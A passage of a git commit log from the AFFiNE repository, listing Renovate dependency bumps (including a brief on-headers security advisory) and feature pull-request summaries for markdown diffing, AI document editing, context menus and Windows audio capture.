- Alexey Filippov
([@&#8203;SocketSomeone](https://redirect.github.com/SocketSomeone))
- EFIcats ([@&#8203;ext4cats](https://redirect.github.com/ext4cats))
- Edouard Maleix
([@&#8203;getlarge](https://redirect.github.com/getlarge))
- JaeHo Jang ([@&#8203;mag123c](https://redirect.github.com/mag123c))
- Jiri Hajek
([@&#8203;hajekjiri](https://redirect.github.com/hajekjiri))
- Kamil Mysliwiec
([@&#8203;kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))
- Khan / 이창민
([@&#8203;EeeasyCode](https://redirect.github.com/EeeasyCode))
- Peter F.
([@&#8203;piotrfrankowski](https://redirect.github.com/piotrfrankowski))
- Sebastian ([@&#8203;gentunian](https://redirect.github.com/gentunian))
- Thiago Oliveira Santos
([@&#8203;Farenheith](https://redirect.github.com/Farenheith))
- jochong ([@&#8203;jochongs](https://redirect.github.com/jochongs))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS40MC4wIiwidXBkYXRlZEluVmVyIjoiNDEuNDAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-07-22 06:05:37 +00:00
renovate[bot] 8cfaee8232 chore: bump up on-headers version to v1.1.0 [SECURITY] (#13260)
This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [on-headers](https://redirect.github.com/jshttp/on-headers) | [`1.0.2`
-> `1.1.0`](https://renovatebot.com/diffs/npm/on-headers/1.0.2/1.1.0) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/on-headers/1.1.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/on-headers/1.0.2/1.1.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-7339](https://redirect.github.com/jshttp/on-headers/security/advisories/GHSA-76c9-3jph-rj3q)

### Impact

A bug in on-headers versions `< 1.1.0` may result in response headers
being inadvertently modified when an array is passed to
`response.writeHead()`

### Patches

Users should upgrade to `1.1.0`

### Workarounds

Uses are encouraged to upgrade to `1.1.0`, but this issue can be worked
around by passing an object to `response.writeHead()` rather than an
array.

---

### Release Notes

<details>
<summary>jshttp/on-headers (on-headers)</summary>

###
[`v1.1.0`](https://redirect.github.com/jshttp/on-headers/blob/HEAD/HISTORY.md#110--2025-07-17)

[Compare
Source](https://redirect.github.com/jshttp/on-headers/compare/v1.0.2...v1.1.0)

\==================

- Fix [CVE-2025-7339](https://www.cve.org/CVERecord?id=CVE-2025-7339)
([GHSA-76c9-3jph-rj3q](https://redirect.github.com/jshttp/on-headers/security/advisories/GHSA-76c9-3jph-rj3q))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4yMy4yIiwidXBkYXRlZEluVmVyIjoiNDEuMjMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-07-22 02:15:02 +00:00
德布劳外 · 贾贵 b53b4884cf refactor(core): align markdown conversion logic (#13254)
## Refactor

Align the Markdown conversion logic across all business modules:
1. frontend/backend apply: doc to markdown
2. insert/import markdown: use `markdownAdapter.toDoc`

> CLOSE AI-328 AI-379 AI-380

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Documentation**
* Clarified instructions and provided an explicit example for correct
list item formatting in the markdown editing tool.

* **Bug Fixes**
* Improved markdown parsing for lists, ensuring correct indentation and
handling of trailing newlines.
* Cleaned up markdown snapshot test files by removing redundant blank
lines for better readability.

* **Refactor**
* Updated markdown conversion logic to use a new parsing approach for
improved reliability and maintainability.
* Enhanced markdown generation method for document snapshots with
improved error handling.
* Refined markdown-to-snapshot conversion with more robust document
handling and snapshot extraction.

* **Chores**
* Added a new workspace dependency for enhanced markdown parsing
capabilities.
* Updated project references and workspace dependencies to include the
new markdown parsing package.

* **Tests**
* Temporarily disabled two markdown-related tests due to parse errors in
test mode.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-21 10:35:13 +00:00
Cats Juice c90d511251 feat(core): server version check for selfhost login (#13247)
close AF-2752;

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added a version compatibility check for self-hosted environments
during sign-in, displaying a clear error message and upgrade
instructions if the server version is outdated.
* **Style**
* Updated the appearance of the notification icon in the mobile header
for improved visual consistency.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-17 09:21:51 +00:00
L-Sun 21360591a9 chore(editor): add table and callout entries for mobile (#13245)
Close
[AF-2755](https://linear.app/affine-design/issue/AF-2755/table-block支持)

#### PR Dependency Tree


* **PR #13245** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Added "Table" and "Callout" options to the keyboard toolbar, allowing
users to insert table and callout blocks directly from the toolbar when
available.

* **Chores**
* Updated internal dependencies to support new block types and maintain
compatibility.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-17 04:17:00 +00:00
EYHN cdff5c3117 feat(core): add context menu for navigation and explorer (#13216)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced a customizable context menu component for desktop
interfaces, enabling right-click menus in various UI elements.
* Added context menu support to document list items and navigation tree
nodes, allowing users to access additional operations via right-click.
* **Improvements**
* Enhanced submenu and menu item components to support both dropdown and
context menu variants based on context.
* Updated click handling in workbench links to prevent unintended
actions on non-left mouse button clicks.
* **Chores**
* Added `@radix-ui/react-context-menu` as a dependency to relevant
frontend packages.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-16 04:40:10 +00:00
EYHN d44771dfe9 feat(electron): add global context menu (#13218)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added automatic synchronization of language settings between the
desktop app and the system environment.
* Context menu actions (Cut, Copy, Paste) in the desktop app are now
localized according to the selected language.

* **Improvements**
* Context menu is always available with standard editing actions,
regardless of spell check settings.

* **Localization**
* Added translations for "Cut", "Copy", and "Paste" in the context menu.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-16 04:37:38 +00:00
德布劳外 · 贾贵 6fd9524521 feat: ai apply ui (#12962)
## New Features
* **Block Meta Markdown Adapter**:Inject the Block's metadata into
Markdown.
* **UI**:Apply interaction
   * **Widget**
* Block-Level Widget: Displays the diffs of individual blocks within the
main content and supports accepting/rejecting individual diffs.
* Page-Level Widget: Displays global options (Accept all/Reject all).
   * **Block Diff Service**:Bridge widget and diff data
* Widget subscribes to DiffMap(RenderDiff) data, refreshing the view
when the data changes.
* Widget performs operations such as Accept/Reject via methods provided
by Service.
   * **Doc Edit Tool Card**:
     * Display apply preview of semantic doc edit
     * Support apply & accept/reject to the main content
* **Apply Playground**:A devtool for testing apply new content to
current

> CLOSE AI-274 AI-275 AI-276  AI-278 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced block-level markdown diffing with accept/reject controls
for insertions, deletions, and updates.
* Added block diff widgets for individual blocks and pages, featuring
navigation and bulk accept/reject actions.
* Provided a block diff playground for testing and previewing markdown
changes (development mode only).
* Added a new document editing AI tool component with interactive diff
viewing and change application.
* Supported rendering of the document editing tool within AI chat
content streams.

* **Improvements**
* Enhanced widget rendering in list, paragraph, data view, and database
blocks for improved extensibility.
* Improved widget flavour matching with hierarchical wildcard support
for more flexible UI integration.

* **Chores**
* Updated the "@toeverything/theme" dependency to version ^1.1.16 across
multiple packages.
* Added new workspace dependencies for core frontend packages to improve
module linkage.
* Extended global styles with visual highlights for deleted blocks in AI
block diff feature.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-08 03:44:44 +00:00
德布劳外 · 贾贵 c882a8c5da feat(core): markdown-diff & patch apply (#12844)
## New Features
- **Markdown diff**: 
- Introduced block-level diffing for markdown content, enabling
detection of insertions, deletions, and replacements between document
versions.
  - Generate patch operations from markdown diff.
- **Patch Renderer**: Transfer patch operations to a render diff which
can be rendered into page body.
- **Patch apply**:Added functionality to apply patch operations to
documents, supporting block insertion, deletion, and content
replacement.

## Refactors
* Move `affine/shared/__tests__/utils` to
`blocksuite/affine-shared/test-utils`


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced utilities for declarative creation and testing of document
structures using template literals.
* Added new functions and types for block-level markdown diffing and
patch application.
* Provided a utility to generate structured render diffs for markdown
blocks.
* Added a unified test-utils entry point for easier access to testing
helpers.

* **Bug Fixes**
* Updated import paths in test files to use the new test-utils location.

* **Documentation**
* Improved example usage in documentation to reflect the new import
paths for test utilities.

* **Tests**
* Added comprehensive test suites for markdown diffing, patch
application, and render diff utilities.

* **Chores**
* Updated package dependencies and export maps to expose new test
utilities.
* Refactored internal test utilities organization for clarity and
maintainability.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

> CLOSE AI-271 AI-272 AI-273
2025-07-04 10:48:49 +00:00
Peng Xiao 8ed7dea823 feat(core): code artifact tool (#13015)
<img width="1272" alt="image"
src="https://github.com/user-attachments/assets/429ec60a-48a9-490b-b45f-3ce7150ef32a"
/>


#### PR Dependency Tree


* **PR #13015** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Introduced a new AI tool for generating self-contained HTML artifacts,
including a dedicated interface for previewing, copying, and downloading
generated HTML.
* Added syntax highlighting and preview capabilities for HTML artifacts
in chat and tool panels.
* Integrated the new HTML artifact tool into the AI chat prompt and
Copilot toolset.

* **Enhancements**
* Improved artifact preview panel layout and sizing for a better user
experience.
* Enhanced HTML preview components to support both model-based and raw
HTML rendering.

* **Dependency Updates**
  * Added the "shiki" library for advanced syntax highlighting.

* **Bug Fixes**
  * None.

* **Chores**
* Updated internal imports and code structure to support new features
and maintain consistency.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-03 23:39:51 +00:00
L-Sun 8ce85f708d feat(editor): comment extension (#12948)
#### PR Dependency Tree


* **PR #12948** 👈
  * **PR #12980**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Introduced inline comment functionality, allowing users to add,
resolve, and highlight comments directly within text.
  * Added a new toolbar action for inserting comments when supported.
* Inline comments are visually highlighted and can be interacted with in
the editor.

* **Enhancements**
  * Integrated a feature flag to enable or disable the comment feature.
* Improved inline manager rendering to support wrapper specs for
advanced formatting.

* **Developer Tools**
* Added mock comment provider for testing and development environments.

* **Chores**
* Updated dependencies and project references to support the new inline
comment module.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-07-02 09:14:34 +00:00
DarkSky 1c1dade2d5 feat(server): add morph doc edit tool (#12789)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- Introduced support for the Morph provider in the copilot module,
enabling integration with the Morph LLM API.
- Added a new document editing tool that allows users to propose and
apply edits to existing documents via AI assistance.
- **Configuration**
- Added configuration options for the Morph provider in both backend and
admin interfaces.
- **Enhancements**
- Expanded tool support to include document editing capabilities within
the copilot feature set.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-06-28 08:27:08 +00:00
Cats Juice ea7678f17e feat(component): new component to edit icon and name (#12921)
https://github.com/user-attachments/assets/994f7f58-bcbe-4f26-9142-282ffa5025f9



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- Introduced an icon and name editor component, allowing users to select
emoji icons and edit names within a menu popover.
- Added an emoji picker for icon selection, supporting theme adaptation.
- **Style**
- Applied new styles for the icon and name editor, including emoji
picker appearance.
- **Documentation**
- Added Storybook stories to showcase and demonstrate the new icon and
name editor component.
- **Chores**
- Added emoji-related dependencies to support emoji selection features.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-06-26 02:39:16 +00:00
Richard Lora a8c18cd631 feat(editor): streamline cell editing and navigation with improved keyboard support (#12770)
https://github.com/user-attachments/assets/6bce5fa3-fb25-4906-bef1-50d4da4a13f6

This PR addresses #12769 and improves table editing UX by making Enter
commit changes and move focus down, and Tab/Shift+Tab move focus
horizontally—matching spreadsheet-like behavior.

Typing now immediately enters edit mode for selected cells without
double-clicking.
These updates apply to both the standard and virtual table views.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- You can now start editing a table cell by simply typing any character
while the cell is selected.
- **Improvements**
- Pressing Enter while editing a cell will exit editing and move focus
down.
- Pressing Tab or Shift-Tab while editing a cell will exit editing and
move focus right or left, respectively.
- **Tests**
- Added unit tests for table cell hotkey behaviors to ensure reliable
editing and navigation.
- **Chores**
- Introduced Vitest configuration for streamlined testing and coverage
reporting.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: L-Sun <zover.v@gmail.com>
2025-06-23 20:24:22 +08:00
Peng Xiao 899ffd1ad3 feat(native): windows audio monitoring & recording (#12615)
fix AF-2692

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- Added comprehensive Windows support for audio and application capture,
including real-time microphone usage detection, combined microphone and
system audio recording, and application state monitoring.
  - The "meetings" setting is now enabled on Windows as well as macOS.
- Conditional UI styling and attributes introduced for Windows
environments in the Electron renderer.

- **Bug Fixes**
- Enhanced file path handling and validation for Windows in Electron
file requests.

- **Refactor**
- Unified application info handling across platforms by consolidating
types into a single `ApplicationInfo` structure.
- Updated native module APIs by removing deprecated types, refining
method signatures, and improving error messages.
- Streamlined audio tapping APIs to use process IDs and consistent
callback types.

- **Documentation**
- Added detailed documentation for the Windows-specific audio recording
and microphone listener modules.

- **Chores**
  - Updated development dependencies in multiple packages.
- Reorganized and added platform-specific dependencies and configuration
for Windows support.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->





#### PR Dependency Tree


* **PR #12615** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

---------

Co-authored-by: LongYinan <lynweklm@gmail.com>
2025-06-18 13:57:01 +08:00
renovate[bot] 29826e1c1e chore: bump up happy-dom version to v18 (#12799)
This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom) |
[`^17.0.0` ->
`^18.0.0`](https://renovatebot.com/diffs/npm/happy-dom/17.4.7/18.0.1) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/happy-dom/18.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/happy-dom/18.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/happy-dom/17.4.7/18.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/happy-dom/17.4.7/18.0.1?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>

###
[`v18.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v18.0.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.0...v18.0.1)

##### 👷‍♂️ Patch fixes

- Addresses an issue where an error occurred if the Element ID was set
to the same name as a Window property with a null value - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1841](https://redirect.github.com/capricorn86/happy-dom/issues/1841)

###
[`v18.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v18.0.0)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.6.3...v18.0.0)

##### 💣 Breaking Changes

- Makes the types for Happy DOM strict - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)
- This makes it possible to use the option `skipLibCheck` set to "false"
in the typescript configuration for projects with a strict configuration
- This change has resulted in that some types has changed and is
therefore considered as a breaking change
- `BrowserContext.close()` now throws an error when trying to close the
default context of a browser - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)

##### 🎨 Features

- Adds support for `Browser.closed`, `BrowserContext.closed`,
`BrowserPage.closed` and `BrowserFrame.closed` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)
- Adds support for `VirtualConsolePrinter.close()` and
`VirtualConsolePrinter.closed` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)
- Adds support for `CookieContainer.clearCookies()` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)

###
[`v17.6.3`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.6.3)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.6.2...v17.6.3)

##### 👷‍♂️ Patch fixes

- Removes global typescript definition that was used for custom elements
- By **[@&#8203;capricorn86](https://redirect.github.com/capricorn86)**
in task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)

###
[`v17.6.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.6.2)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.6.1...v17.6.2)

##### 👷‍♂️ Patch fixes

- Updates Typescript to the latest version - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1154](https://redirect.github.com/capricorn86/happy-dom/issues/1154)

###
[`v17.6.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.6.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.6.0...v17.6.1)

##### 🎨 Features

- Adds support for disabling validation of certificates, to allow for
self-signed certificates to be used - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1763](https://redirect.github.com/capricorn86/happy-dom/issues/1763)
- Read more about the new setting `fetch.disableStrictSSL` under
[IBrowserSettings](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings)
in the Wiki

###
[`v17.6.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.9...v17.6.0)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.9...v17.6.0)

###
[`v17.5.9`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.9)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.8...v17.5.9)

##### 👷‍♂️ Patch fixes

- Adds missing null check in `HTMLLinkElement` for a browser frame
property that becomes null during teardown of a `Window` - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1800](https://redirect.github.com/capricorn86/happy-dom/issues/1800)

###
[`v17.5.8`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.8)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.7...v17.5.8)

##### 👷‍♂️ Patch fixes

- Incorrect cache matching caused `Element.classList` to return the
wrong items - By
**[@&#8203;capricorn86](https://redirect.github.com/capricorn86)** in
task
[#&#8203;1812](https://redirect.github.com/capricorn86/happy-dom/issues/1812)

###
[`v17.5.7`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.7)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.6...v17.5.7)

##### 👷‍♂️ Patch fixes

- Handle wider range of valid characters in unquoted attribute value
parsing - By **[@&#8203;AudunWA](https://redirect.github.com/AudunWA)**
in task
[#&#8203;1817](https://redirect.github.com/capricorn86/happy-dom/issues/1817)

###
[`v17.5.6`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.6)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.5...v17.5.6)

##### 👷‍♂️ Patch fixes

- Removes the min and max boundary check when setting the value of an
input field of type "date" - By
**[@&#8203;zgrybus](https://redirect.github.com/zgrybus)** in task
[#&#8203;1815](https://redirect.github.com/capricorn86/happy-dom/issues/1815)

###
[`v17.5.5`](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.4...v17.5.5)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.4...v17.5.5)

###
[`v17.5.4`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.4)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.3...v17.5.4)

##### 👷‍♂️ Patch fixes

- Fixes issue where the body of a `ReadableStream` was locked after
being cloned - By
**[@&#8203;MarcMcIntosh](https://redirect.github.com/MarcMcIntosh)** in
task
[#&#8203;1493](https://redirect.github.com/capricorn86/happy-dom/issues/1493)

###
[`v17.5.3`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.3)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.2...v17.5.3)

##### 👷‍♂️ Patch fixes

- Adds `previousSibling` and `nextSibling` to `MutationObserver` records
when a child is removed - By
**[@&#8203;uxuip](https://redirect.github.com/uxuip)** in task
[#&#8203;1803](https://redirect.github.com/capricorn86/happy-dom/issues/1803)

###
[`v17.5.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.2)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.1...v17.5.2)

##### 👷‍♂️ Patch fixes

- Adds support for the unicode characters `«` and `»` in query selectors
used by the React 19.1 "useId" hook - By
**[@&#8203;terrymun](https://redirect.github.com/terrymun)** in task
[#&#8203;1785](https://redirect.github.com/capricorn86/happy-dom/issues/1785)

###
[`v17.5.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.1)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.5.0...v17.5.1)

##### 👷‍♂️ Patch fixes

- Existing URL query string should be overwritten on form submit when
method is "GET" - By
**[@&#8203;rslabbert](https://redirect.github.com/rslabbert)** in task
[#&#8203;1786](https://redirect.github.com/capricorn86/happy-dom/issues/1786)

###
[`v17.5.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.5.0)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.4.9...v17.5.0)

##### 🎨 Features

- Adds support for `XMLHttpRequest.overrideMimeType()` - By
**[@&#8203;maxmil](https://redirect.github.com/maxmil)** in task
[#&#8203;1782](https://redirect.github.com/capricorn86/happy-dom/issues/1782)

###
[`v17.4.9`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.4.9)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.4.8...v17.4.9)

##### 👷‍♂️ Patch fixes

- A disabled input element should not be parsed in `FormData` - By
**[@&#8203;juandiegombr](https://redirect.github.com/juandiegombr)** in
task
[#&#8203;1790](https://redirect.github.com/capricorn86/happy-dom/issues/1790)

###
[`v17.4.8`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v17.4.8)

[Compare
Source](https://redirect.github.com/capricorn86/happy-dom/compare/v17.4.7...v17.4.8)

##### 👷‍♂️ Patch fixes

- Fixes issue where CSS variables where not being parsed in color
functions - By
**[@&#8203;hampustagerud](https://redirect.github.com/hampustagerud)**
in task
[#&#8203;1822](https://redirect.github.com/capricorn86/happy-dom/issues/1822)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MC41MC4wIiwidXBkYXRlZEluVmVyIjoiNDAuNTAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: fengmk2 <fengmk2@gmail.com>
2025-06-17 22:52:01 +08:00